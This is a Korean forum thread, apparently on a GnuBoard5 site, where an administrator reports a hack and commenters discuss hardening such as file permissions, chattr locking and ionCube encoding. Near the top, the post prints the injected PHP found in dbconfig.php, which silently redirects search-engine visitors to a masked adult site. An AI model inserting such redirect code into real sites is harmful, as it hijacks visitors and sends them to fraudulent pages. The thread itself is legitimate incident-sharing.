그누보드5 해킹 후 dbconfig.php에 URL 납취를 하였네요 ㅎ 정보
그누보드5 해킹 후 dbconfig.php에 URL 납취를 하였네요 ㅎ
본문
지속적인 업데이트를 않해줘서 그랬는지
/data 폴더에 접근하여 dbconfig.php를 수정하여
include("jc.php")
error_reporting(0);
$refer=$_SERVER['HTTP_REFERER'];
if(stristr($refer,"daum")||stristr($refer,"naver")||stristr($refer,"http")||stristr($refer,"google")||stristr($refer,"bing")||stristr($refer,"nate")||stristr($refer,"zum")||stristr($refer,"msn"))
{
header("location:http://g***.b*-***.com");
exit();
}
이런짓을 하고 갔네요
자꾸 음란 사이트로 들어가지길래 왜이러나 했디만...
큭 ㅠ
추천
1
1
댓글 36개
참고바랍니다~
http://sir.kr/cm_free/1378097
http://sir.kr/cm_free/1378097
참고로 너무 힘들면 data 폴더에 dbconfig.php 를 다른곳으로 옴기고 common.php 에서 dbconfig.php 확인 경로를 다른곳으로 옴기세요..ㅎㅎ 잼뜸 ..ㅇㅅㅇ.. 제 사이트 도 그런 경우가 있다보니 보안 펀션만 그누보드5 를 좀 쓰고 나머진 자체제작... ㅇㅅㅇ..
@익명닉네임 와우 좋은 팁이네요
@우성님 굳이 dbconfig.php 를 data 폴더에 넣을 필요가 없죠.. 보안이 걱정되면.. common.php 만 탈취안되면 common.php 에서 dbconfig.php 경로를 다른곳으로 옴기고 data 폴더에 dbconfig.php 를 다른곳으로 옴기면 된다는.. ㅎㅎ
어디서 어떻게 뚫렸는지 확인이 가능 한가요?
그누보드 자체에서 뚫린것인지 아님 다른경로로 뚫린것이지....
@익명닉네임 dbconfig.php,common.php 파일을 이동해 놓으면 뭐합니까?
뚤리면 다찾아서 수정하면 아무소용 없는것을.....ㅠㅠ
그누보드 자체에서 뚫린것인지 아님 다른경로로 뚫린것이지....
@익명닉네임 dbconfig.php,common.php 파일을 이동해 놓으면 뭐합니까?
뚤리면 다찾아서 수정하면 아무소용 없는것을.....ㅠㅠ
@亞波治 그거까진 저도..음... ?!
@익명닉네임 ㅋㅋㅋ
@亞波治 data 폴더는 707이니 ㅎㅎ 다른 곳은 그나마 낫지않을까요 ㅎ
@亞波治 중국발 해킹으로 의심되네요...해커가 정해놓은 사이트 역시 성인 사이트를 가장한 금전 갈취를 목적으로 한것 같은데... 네이버에서 검색하면 TITLE 까지 수정을 해놓았더라구요 ;;;
dbconfig.php 파일의 소유권을 변경해서 웹서버 쓰기권한만 없애도
파일이 변경되는 일은 없을 것 같은데요..
파일이 변경되는 일은 없을 것 같은데요..
@편리 좋은 아이디어 입니다만, 호스팅 사용자는 소유권 변경을 못하지 않나요?
@亞波治 소유권 변경을 위한 php 파일을 생성해서 웹서버 권한으로 실행시키면 가능할 것 같은데요..
@편리 근데 data 폴더를 굳이 707 로 셋팅 안하고 755 로 해도 설치가 되는데
755 로 해도 해킹되는건가여?? 개인적으로 궁굼해서 물어봅니닷.
755 로 해도 해킹되는건가여?? 개인적으로 궁굼해서 물어봅니닷.
@익명닉네임 저번에 755 세팅해 본 적 있는데, 아미나 빌더 사용할 때 문제 있더라구요..
@편리 호스팅에 따라 안되는곳이 많을듯 싶네요....^^;;
쉘에서 chattr 를 쓸수 있으면 잠글수 있을텐데....
chattr +I dbconfig.php
이러면 볼수는 있어도 수정은 불가 할테니.....ㅋㅋ
쉘에서 chattr 를 쓸수 있으면 잠글수 있을텐데....
chattr +I dbconfig.php
이러면 볼수는 있어도 수정은 불가 할테니.....ㅋㅋ
@亞波治 아파치 님, 이 명령어로 잠근 건, 그럼 어케 다시 푸나요?
@sinbi chattr -i dbconfig.php 입니다.
잠겼는지 확인은 lsattr 하시면 잠겼을때 ----i-------- dbconfig.php 이렇게 출력 됩니다....^^
잠겼는지 확인은 lsattr 하시면 잠겼을때 ----i-------- dbconfig.php 이렇게 출력 됩니다....^^
@亞波治 좋은 정보 감사합니다. ^^
저 같은경우엔 dbconfig.php파일은 그냥 이온큐브로... 쿨럭;
@sinbi 담배피는 아이 어디갔는지..ㅠㅠ..
블랙프라이데이때를 노려야 합니다 ㅎ
블랙프라이데이때를 노려야 합니다 ㅎ
@sinbi 지금 찾아보니 179달러에 구매했네요, 프로버전을요.
프로버전이 대략 45만원하는건데 저렴하게 구매했죠.
PHP Encoder Pro Edition 8 for Linux 179.00(USD)
프로버전이 대략 45만원하는건데 저렴하게 구매했죠.
PHP Encoder Pro Edition 8 for Linux 179.00(USD)
@l2zeo 와...........어마어마하게 가격할인 구매하셨네요. 저도 한번 노려봐야겠네요.^^
@l2zeo 담배 피는 아가는 어째셨어요? ㅋ
@l2zeo 구입비용이 어마어마 하잖아요....ㅋㅋ
@亞波治 저도 구입가격때문에 망설이던찰나에 블랙프라이데이때 구매했었습니다 ^^ㅎ
@l2zeo 저도 블랙 프라이데이나 사이버 데이를 노려야 겠군요. 하나 질러 봐야겠는데 어디에다 쓰죠???
@亞波治 dbconfig.php 암호화할때요...ㅠㅠ
혹시 그누보드 버젼을 알수있나요?
ㅜㅜㅜ
많은 분들이 이렇게 글들을 남겨주시니 +_+ 힘이 나네요
나는 그거보다
생성된 파일도 없고 변조된 파일도 없는데
메인 캐시의 도메인이 임의로 바뀌던데......
아직 이유는 못찾고 시간도 없고 해서
캐시 사용안함으로 바꿧습니다.
그것도 중국 사이트
그리고 물론, 최신 버전입니다.
생성된 파일도 없고 변조된 파일도 없는데
메인 캐시의 도메인이 임의로 바뀌던데......
아직 이유는 못찾고 시간도 없고 해서
캐시 사용안함으로 바꿧습니다.
그것도 중국 사이트
그리고 물론, 최신 버전입니다.
@유창화 캐시사용안함이후로는 괜찮던가요??
@l2zeo 네 아직 괜찮은거 같습니다.
보안이라는게 끝이 없네요.
막는자와 뚫으려는자. ^^
막는자와 뚫으려는자. ^^
